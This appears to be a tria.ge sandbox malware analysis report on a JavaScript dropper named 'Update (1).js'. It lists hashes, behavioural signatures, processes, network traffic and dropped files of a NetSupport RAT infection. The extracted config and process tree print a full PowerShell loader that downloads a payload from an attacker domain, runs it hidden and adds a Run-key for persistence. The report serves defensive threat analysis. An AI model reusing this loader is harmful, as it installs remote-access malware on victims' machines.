Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    12s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/08/2024, 12:54 UTC

General

  • Target

    Update (1).js

  • Size

    3.9MB

  • MD5

    c4aefe9f1ce6862df4f981938a2147f1

  • SHA1

    21e080d2a38237413aad3d5fa5b54307430eb864

  • SHA256

    7f76bf19775cb619c66e6636e463fb75f8d2e1c279c7d02806eb5d0674728b02

  • SHA512

    c274cca49452500c9e5cdf4316a9be130df1a2b54e376ba23d2ba9f14fb5d01f30afc4b5aeca184c11a5eba6f7eef8c851c843083b0ee8c474ad1765b49021d8

  • SSDEEP

    49152:6sz6FvpOiHY7sz6FvpOiHYXsz6FvpOiHY7sz6FvpOiHYnsz6FvpOiHY7sz6FvpOQ:60WQ0Ws0WQ0We0WQ0W5

Malware Config

Extracted

Language
ps1
Source
1
$MXIVJXBN='http://didsit.com/data.php?9427';$BXTZSF=(New-Object System.Net.WebClient).DownloadString($MXIVJXBN);$FREE=[System.Convert]::FromBase64String($BXTZSF);$asd = Get-Random -Minimum -10 -Maximum 17; $LXFQCVH=[System.Environment]::GetFolderPath('ApplicationData')+'\JSPFTPKGDNA'+$asd;if (!(Test-Path $LXFQCVH -PathType Container)) { New-Item -Path $LXFQCVH -ItemType Directory };$p=Join-Path $LXFQCVH 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$FREE);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LXFQCVH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LXFQCVH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LXFQCVH -Force; $fd.attributes='Hidden';$s=$LXFQCVH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='MBASA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
URLs
ps1.dropper

http://didsit.com/data.php?9427

exe.dropper

http://didsit.com/data.php?9427

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Update (1).js"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $MXIVJXBN='http://didsit.com/data.php?9427';$BXTZSF=(New-Object System.Net.WebClient).DownloadString($MXIVJXBN);$FREE=[System.Convert]::FromBase64String($BXTZSF);$asd = Get-Random -Minimum -10 -Maximum 17; $LXFQCVH=[System.Environment]::GetFolderPath('ApplicationData')+'\JSPFTPKGDNA'+$asd;if (!(Test-Path $LXFQCVH -PathType Container)) { New-Item -Path $LXFQCVH -ItemType Directory };$p=Join-Path $LXFQCVH 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$FREE);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LXFQCVH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LXFQCVH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LXFQCVH -Force; $fd.attributes='Hidden';$s=$LXFQCVH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='MBASA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5004
      • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\client32.exe
        "C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1948

Network

  • flag-us
    DNS
    writeindia.com
    wscript.exe
    Remote address:
    8.8.8.8:53
    Request
    writeindia.com
    IN A
    Response
    writeindia.com
    IN A
    37.1.210.252
  • flag-us
    POST
    https://writeindia.com/cdn-vs/download.php?631
    wscript.exe
    Remote address:
    37.1.210.252:443
    Request
    POST /cdn-vs/download.php?631 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Content-Length: 0
    Host: writeindia.com
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 09 Aug 2024 12:55:02 GMT
    Content-Type: application/octet-stream
    Content-Length: 2333605
    Connection: keep-alive
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=updates.js
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: must-revalidate
    Pragma: public
  • flag-us
    DNS
    252.210.1.37.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    252.210.1.37.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    4.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    didsit.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    didsit.com
    IN A
    Response
    didsit.com
    IN A
    37.1.210.252
  • flag-us
    GET
    http://didsit.com/data.php?9427
    powershell.exe
    Remote address:
    37.1.210.252:80
    Request
    GET /data.php?9427 HTTP/1.1
    Host: didsit.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 09 Aug 2024 12:55:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-us
    DNS
    geo.netsupportsoftware.com
    client32.exe
    Remote address:
    8.8.8.8:53
    Request
    geo.netsupportsoftware.com
    IN A
    Response
    geo.netsupportsoftware.com
    IN A
    104.26.0.231
    geo.netsupportsoftware.com
    IN A
    104.26.1.231
    geo.netsupportsoftware.com
    IN A
    172.67.68.212
  • flag-us
    GET
    http://geo.netsupportsoftware.com/location/loca.asp
    client32.exe
    Remote address:
    104.26.0.231:80
    Request
    GET /location/loca.asp HTTP/1.1
    Host: geo.netsupportsoftware.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 09 Aug 2024 12:55:09 GMT
    Content-Type: text/html; charset=us-ascii
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Ray: 8b07e61e38ba6382-LHR
    CF-Cache-Status: DYNAMIC
    cf-apo-via: origin,host
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z1lfs69qf7waO6pYbk1QyzItY7wRUhok%2F2UzvrtuI2NFFb2zx2ZU0%2BbpNWqGcsD6FfZeIraQJSubTEZEWTLNHevf3RM41icmcw9gyJx7PUi2t%2BhK6ig83eDiPfbcW4vQKqkGSlcWzyF51OPl"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
  • flag-us
    GET
    http://geo.netsupportsoftware.com/location/loca.asp
    client32.exe
    Remote address:
    104.26.0.231:80
    Request
    GET /location/loca.asp HTTP/1.1
    Host: geo.netsupportsoftware.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 09 Aug 2024 12:55:10 GMT
    Content-Type: text/html; charset=us-ascii
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Ray: 8b07e61f19967779-LHR
    CF-Cache-Status: DYNAMIC
    cf-apo-via: origin,host
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ti%2Bc9b71qRMvUwPE5QYtYwtZu4PG5NPbsaNCd0yEpLtjDLX6FsD79zE2I60xpMCB51NKXyRZQnQoWTu1CvGGjkCKiAjc%2F9ow5I2QG7seBYpfJ6T%2BHvHqPNDJi%2FTZSJYACCELOs5sSTsvGNW%2F"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
  • flag-us
    GET
    http://geo.netsupportsoftware.com/location/loca.asp
    client32.exe
    Remote address:
    104.26.0.231:80
    Request
    GET /location/loca.asp HTTP/1.1
    Host: geo.netsupportsoftware.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Fri, 09 Aug 2024 12:55:10 GMT
    Content-Type: text/html; charset=us-ascii
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Ray: 8b07e61fd8a1653f-LHR
    CF-Cache-Status: DYNAMIC
    cf-apo-via: origin,host
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJ1%2FRqEVenAY6t8x7m%2B7eFkxPgvFlTnTniLHY8IvlRyZn9UatTIGvP1TzthEeQqQ0tjpvJFuHBbwPJ3px8U11vx3juwJuskKM3243O5D1w5sv8e29FkDRecDSC383cf0KKAwSH8fRy33PzGK"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
  • flag-us
    DNS
    28.159.181.5.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.159.181.5.in-addr.arpa
    IN PTR
    Response
    28.159.181.5.in-addr.arpa
    IN PTR
    no-rdns mivocloudcom
  • flag-us
    DNS
    231.0.26.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    231.0.26.104.in-addr.arpa
    IN PTR
    Response
  • 37.1.210.252:443
    https://writeindia.com/cdn-vs/download.php?631
    tls, http
    wscript.exe
    69.0kB
    2.4MB
    1274
    1735

    HTTP Request

    POST https://writeindia.com/cdn-vs/download.php?631

    HTTP Response

    200
  • 37.1.210.252:80
    http://didsit.com/data.php?9427
    http
    powershell.exe
    85.6kB
    3.7MB
    1726
    2658

    HTTP Request

    GET http://didsit.com/data.php?9427

    HTTP Response

    200
  • 5.181.159.28:443
    http
    client32.exe
    1.4kB
    733 B
    6
    5
  • 104.26.0.231:80
    http://geo.netsupportsoftware.com/location/loca.asp
    http
    client32.exe
    440 B
    1.1kB
    7
    4

    HTTP Request

    GET http://geo.netsupportsoftware.com/location/loca.asp

    HTTP Response

    404
  • 104.26.0.231:80
    http://geo.netsupportsoftware.com/location/loca.asp
    http
    client32.exe
    440 B
    1.1kB
    7
    4

    HTTP Request

    GET http://geo.netsupportsoftware.com/location/loca.asp

    HTTP Response

    404
  • 104.26.0.231:80
    http://geo.netsupportsoftware.com/location/loca.asp
    http
    client32.exe
    440 B
    1.1kB
    7
    4

    HTTP Request

    GET http://geo.netsupportsoftware.com/location/loca.asp

    HTTP Response

    404
  • 8.8.8.8:53
    writeindia.com
    dns
    wscript.exe
    60 B
    76 B
    1
    1

    DNS Request

    writeindia.com

    DNS Response

    37.1.210.252

  • 8.8.8.8:53
    252.210.1.37.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    252.210.1.37.in-addr.arpa

  • 8.8.8.8:53
    4.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    4.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    didsit.com
    dns
    powershell.exe
    56 B
    72 B
    1
    1

    DNS Request

    didsit.com

    DNS Response

    37.1.210.252

  • 8.8.8.8:53
    geo.netsupportsoftware.com
    dns
    client32.exe
    72 B
    120 B
    1
    1

    DNS Request

    geo.netsupportsoftware.com

    DNS Response

    104.26.0.231
    104.26.1.231
    172.67.68.212

  • 8.8.8.8:53
    28.159.181.5.in-addr.arpa
    dns
    71 B
    106 B
    1
    1

    DNS Request

    28.159.181.5.in-addr.arpa

  • 8.8.8.8:53
    231.0.26.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    231.0.26.104.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ihlmgskb.jbi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\HTCTL32.DLL

    Filesize

    320KB

    MD5

    c94005d2dcd2a54e40510344e0bb9435

    SHA1

    55b4a1620c5d0113811242c20bd9870a1e31d542

    SHA256

    3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

    SHA512

    2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\MSVCR100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\NSM.LIC

    Filesize

    195B

    MD5

    e9609072de9c29dc1963be208948ba44

    SHA1

    03bbe27d0d1ba651ff43363587d3d6d2e170060f

    SHA256

    dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

    SHA512

    f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\PCICHEK.DLL

    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\PCICL32.DLL

    Filesize

    3.6MB

    MD5

    d3d39180e85700f72aaae25e40c125ff

    SHA1

    f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

    SHA256

    38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

    SHA512

    471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\client32.exe

    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\client32.ini

    Filesize

    668B

    MD5

    a7d077a1aa3244f7251c1f0ffe6b875f

    SHA1

    b32ba9dcab9d5108b1b887e7dcea339b7e5467d4

    SHA256

    0eb705d2d4fabb4350c7c3bfd097ee2ad74db89283b7b6bd35a6c89bfaee7eb3

    SHA512

    c4e6a7142a7cc29e188e791ad3834037f029c717bb58942dda592732791d9ea056e84d27bf6a73d39e7c4ed98128236545b070d835208d75c83ebad149ecb4b8

  • C:\Users\Admin\AppData\Roaming\JSPFTPKGDNA1\pcicapi.dll

    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

  • memory/5004-15-0x000001C955C00000-0x000001C955C12000-memory.dmp

    Filesize

    72KB

  • memory/5004-14-0x000001C93D9B0000-0x000001C93D9BA000-memory.dmp

    Filesize

    40KB

  • memory/5004-87-0x00007FFFE4170000-0x00007FFFE4C31000-memory.dmp

    Filesize

    10.8MB

  • memory/5004-12-0x00007FFFE4170000-0x00007FFFE4C31000-memory.dmp

    Filesize

    10.8MB

  • memory/5004-0-0x00007FFFE4173000-0x00007FFFE4175000-memory.dmp

    Filesize

    8KB

  • memory/5004-11-0x00007FFFE4170000-0x00007FFFE4C31000-memory.dmp

    Filesize

    10.8MB

  • memory/5004-1-0x000001C93D970000-0x000001C93D992000-memory.dmp

    Filesize

    136KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.